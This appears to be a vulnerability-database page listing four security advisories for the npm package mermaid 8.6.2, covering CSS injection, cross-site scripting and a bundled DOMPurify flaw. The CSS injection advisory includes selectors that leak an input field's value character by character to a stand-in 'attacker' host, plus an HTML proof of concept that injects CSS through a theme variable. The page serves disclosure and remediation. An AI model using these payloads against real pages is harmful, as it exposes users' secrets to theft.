Search for packages
| purl | pkg:npm/mermaid@8.6.2 |
| Vulnerability | Summary | Fixed by |
|---|---|---|
|
VCID-6qac-5y2d-akdd
Aliases: CVE-2022-31108 GHSA-x3vm-38hw-55wf |
Possible inject arbitrary `CSS` into the generated graph affecting the container HTML An attacker is able to inject arbitrary `CSS` into the generated graph allowing them to change the styling of elements outside of the generated graph, and potentially exfiltrate sensitive information by using specially crafted `CSS` selectors. The following example shows how an attacker can exfiltrate the contents of an input field by bruteforcing the `value` attribute one character at a time. Whenever there is an actual match, an `http` request will be made by the browser in order to "load" a background image that will let an attacker know what's the value of the character. ```css input[name=secret][value^=g] { background-image: url(http://attacker/?char=g); } ... input[name=secret][value^=go] { background-image: url(http://attacker/?char=o); } ... input[name=secret][value^=goo] { background-image: url(http://attacker/?char=o); } ... input[name=secret][value^=goos] { background-image: url(http://attacker/?char=s); } ... input[name=secret][value^=goose] { background-image: url(http://attacker/?char=e); } ``` ### Patches _Has the problem been patched? What versions should users upgrade to?_ ### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ ### References _Are there any links users can visit to find out more?_ ### For more information If you have any questions or comments about this advisory: * Open an issue in [example link to repo](http://example.com) * Email us at [example email address](mailto:example@example.com) ## Product mermaid.js ## Tested Version [v9.1.1](https://github.com/mermaid-js/mermaid/releases/tag/9.1.1) ## Details ### Issue 1: Multiple CSS Injection (`GHSL-2022-036`) By supplying a carefully crafted `textColor` theme variable, an attacker can inject arbitrary `CSS` rules into the document. In the following snippet we can see that `getStyles` does not sanitize any of the theme variables leaving the door open for `CSS` injection. _Snippet from [src/styles.js](https://github.com/mermaid-js/mermaid/blob/9eae97ddab1b6eca58d2fd4af62357d2f4d8d1f7/src/styles.js#L35):_ ```js const getStyles = (type, userStyles, options) => { return ` { font-family: ${options.fontFamily}; font-size: ${options.fontSize}; fill: ${options.textColor} } ``` For example, if we set `textColor` to `"green;} #target { background-color: crimson }"` the resulting `CSS` will contain a new selector `#target` that will apply a `crimson` background color to an arbitrary element. ```html <html> <body> <div id="target"> <h1>This element does not belong to the SVG but we can style it</h1> </div> <svg id="diagram"> </svg> <script src="https://cdn.jsdelivr.net/npm/mermaid/dist/mermaid.min.js"></script> <script> mermaid.initialize({ startOnLoad: false }); const graph = ` %%{ init: { "themeVariables" : { "textColor": "green;} #target { background-color: crimson }" } } }%% graph TD A[Goose] ` const diagram = document.getElementById("diagram") const svg = mermaid.render('diagram-svg', graph) diagram.innerHTML = svg </script> </body> </html> ``` In the proof of concept above we used the `textColor` variable to inject `CSS`, but there are multiple functions that can potentially be abused to change the style of the document. Some of them are in the following list but we encourage mantainers to look for additional injection points: - https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/mermaidAPI.js#L393 - https://github.com/mermaid-js/mermaid/blob/5d30d465354f804e361d7a041ec46da6bb5d583b/src/styles.js#L35 #### Impact This issue may lead to `Information Disclosure` via CSS selectors and functions able to generate HTTP requests. This also allows an attacker to change the document in ways which may lead a user to perform unintended actions, such as clicking on a link, etc. #### Remediation Ensure that user input is adequately escaped before embedding it in CSS blocks. |
Affected by 2 other vulnerabilities. Affected by 1 other vulnerability. |
|
VCID-fgz4-kbun-23bn
Aliases: CVE-2021-43861 GHSA-p3rp-vmj9-gv6v |
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') Mermaid is a Javascript based diagramming and charting tool that uses Markdown-inspired text definitions and a renderer to create and modify complex diagrams., malicious diagrams can run javascript code at diagram readers' machines. Users should upgrade to to receive a patch. There are no known workarounds aside from upgrading. |
Affected by 2 other vulnerabilities. |
|
VCID-fwuk-z3uk-1ygf
Aliases: GHSA-m4gq-x24j-jpmf |
Prototype pollution vulnerability found in Mermaid's bundled version of DOMPurify The following bundled files within the Mermaid NPM package contain a bundled version of DOMPurify that is vulnerable to https://github.com/cure53/DOMPurify/security/advisories/GHSA-mmhx-hmjr-r674, potentially resulting in an XSS attack. This affects the built: - `dist/mermaid.min.js` - `dist/mermaid.js` - `dist/mermaid.esm.mjs` - `dist/mermaid.esm.min.mjs` This will also affect users that use the above files via a CDN link, e.g. `https://cdn.jsdelivr.net/npm/mermaid@10.9.2/dist/mermaid.min.js` **Users that use the default NPM export of `mermaid`, e.g. `import mermaid from 'mermaid'`, or the `dist/mermaid.core.mjs` file, do not use this bundled version of DOMPurify, and can easily update using their package manager with something like `npm audit fix`.** ### Patches - `develop` branch: 6c785c93166c151d27d328ddf68a13d9d65adc00 - backport to v10: 92a07ffe40aab2769dd1c3431b4eb5beac282b34 |
Affected by 1 other vulnerability. Affected by 1 other vulnerability. |
|
VCID-x94b-cysu-4fbe
Aliases: CVE-2021-35513 GHSA-4f6x-49g2-99fm |
Cross-site Scripting in Mermaid Mermaid before 8.11.0 allows XSS when the antiscript feature is used. |
Affected by 3 other vulnerabilities. |
| Vulnerability | Summary | Aliases |
|---|---|---|
| This package is not known to fix vulnerabilities. | ||